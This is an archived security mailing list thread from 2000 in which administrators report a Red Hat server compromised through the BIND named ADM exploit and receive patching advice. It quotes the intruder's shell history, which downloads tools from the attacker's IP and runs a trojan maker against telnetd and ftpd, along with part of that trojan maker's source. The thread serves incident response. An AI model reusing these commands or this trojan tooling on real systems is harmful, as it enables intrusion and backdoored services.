Security Incidents mailing list archives
Re: succesful crack
From: rgupta () INTERLYNX NET (R. Gupta)
Date: Thu, 17 Feb 2000 16:14:44 -0500
Hello, I was also "hacked" from the same originating IP as the intruder on your system [24.11.98.152 (c505000-a.blfld1.ct.home.com)]. I had been running Redhat 6.1. I noticed the intruder added some accounts such as username "own", and ftp'd to his ip [24.11.98.152] and downloaded fun2.c, and compiled this. Upon further investigation, all the named comfiguration files and binary were removed from my system. I suspect the intruder had no idea how to apply any sort of patch, so decided to kill the process and delete the files so nobody could do the same he did. -RGUPTA ----- Original Message ----- From: "Gene Harris" <zeus () TETRONSOFTWARE COM> To: <INCIDENTS () SECURITYFOCUS COM> Sent: Wednesday, February 16, 2000 9:00 AM Subject: Re: succesful crack
On Tue, 15 Feb 2000, Bob Lockie wrote:rjlockie () home net (613) 765-5409 My box (24.112.89.219) was cracked. The attack originated from 24.11.98.152
(c505000-a.blfld1.ct.home.com).
It could be this machine was also cracked and it was used as a
launching point.
Please contact the owner and have a talk with them. The owner should definitely not offer anonymous ftp service. A few things were left on my system. drwxr-xr-x 2 root root 1024 Feb 13 22:03 ADMROCKS I have no /etc/host.allow or /etc/hosts.deny files anymore. This was in /tmp/,bash_history. ftp 24.11.98.152 tar -xvf btm.tar make ./btm /usr/sbin/in.telnetd ./btm /usr/sbin/in.ftpd rm -rf btm.tar The following source: /* bin trojan maker */ #include "btm.h" #define BTM_VER "btm v1.5" int options=0; void usage(char* progname) { printf("usage: %s [-d] [-D define line] [-c] [-l max] [-v] [-u
compiler]"
" [-o compiler options] target [trojan
source]\n",progname);
printf("in trojan source, the trojan function must be:\n"); printf(" "TROJAN_FCT"(char** argv,char** envp)\n"); printf("\n"); printf("-d: debug mode\n"); printf("-c: don't trojan, just put the C file on stdout\n"); printf("-l max: max number of char in a line of the C file\n"); printf("-v: display version\n"); printf("-u compiler: use this compiler\n"); printf("-o options: options for compiler\n"); printf("-n: no save for target file\n"); printf("-e: echo commands\n"); printf("-m comments: put comments in btmized file\n"); printf("\n"); exit(0); } int getdirname(char* dirname,char* filename,size_t dirname_size) { if (!filename) return -1; if (filename[0]=='/') { strncpy(dirname,filename,dirname_size); *(((char*)strrchr(dirname,'/'))+1)=0; } else { if (!getcwd(dirname,dirname_size)) { perror("getcwd"); return -1; } } return 0; } /var/log/secure Feb 14 01:04:23 gw PAM_pwdb[6868]: (login) session opened for user tek
by (uid=0
) Feb 14 01:04:25 gw PAM_pwdb[6883]: (su) session opened for user own by
tek(uid=5
000) Bob Lockie bjlockie () nortelnetworks com Live long and prosper.You been the victim of a named daemon exploit. The ADM attack is effective against older versions of named. There have been discussions of ADMROCKS and the named exploit in this news group in the last several weeks. Upgrade named to 8.2.2-P3 at a minimum. If you are running RedHat 6.1, they have had an advisory out to upgrade bind (named) for quite some time. Please check their support site -> errata -> security. Good Luck, Gene
Current thread:
- ports ports and more ports Tyler (Feb 11)
- Re: ports ports and more ports David Getchell (Feb 15)
- Dispostion of UPD/137 packets? Bill Pennington (Feb 15)
- Re: ports ports and more ports Robert Lau (Feb 15)
- succesful crack Bob Lockie (Feb 15)
- Re: succesful crack Gene Harris (Feb 16)
- Re: succesful crack **read nine (Feb 17)
- Re: succesful crack R. Gupta (Feb 17)
- Re: succesful crack Gene Harris (Feb 16)
- Port Scanning (perhaps related to "A very strange port scan") Warren Belfer (Feb 15)
- MASSIVE ssh attack attempt Mark Shirley (Feb 15)
- Re: MASSIVE ssh attack attempt Omachonu Ogali (Feb 16)
- Re: MASSIVE ssh attack attempt Jose Nazario (Feb 17)
- Re: MASSIVE ssh attack attempt Brendan Grieve (Feb 17)
- Re: MASSIVE ssh attack attempt Robert Lau (Feb 16)
- Re: MASSIVE ssh attack attempt David A. Bandel (Feb 17)
- Re: MASSIVE ssh attack attempt Robert Lau (Feb 17)
- Re: MASSIVE ssh attack attempt Filip M. Gieszczykiewicz (Feb 17)
- Re: MASSIVE ssh attack attempt Robert Graham (Feb 18)
- Re: MASSIVE ssh attack attempt Omachonu Ogali (Feb 16)
(Thread continues...)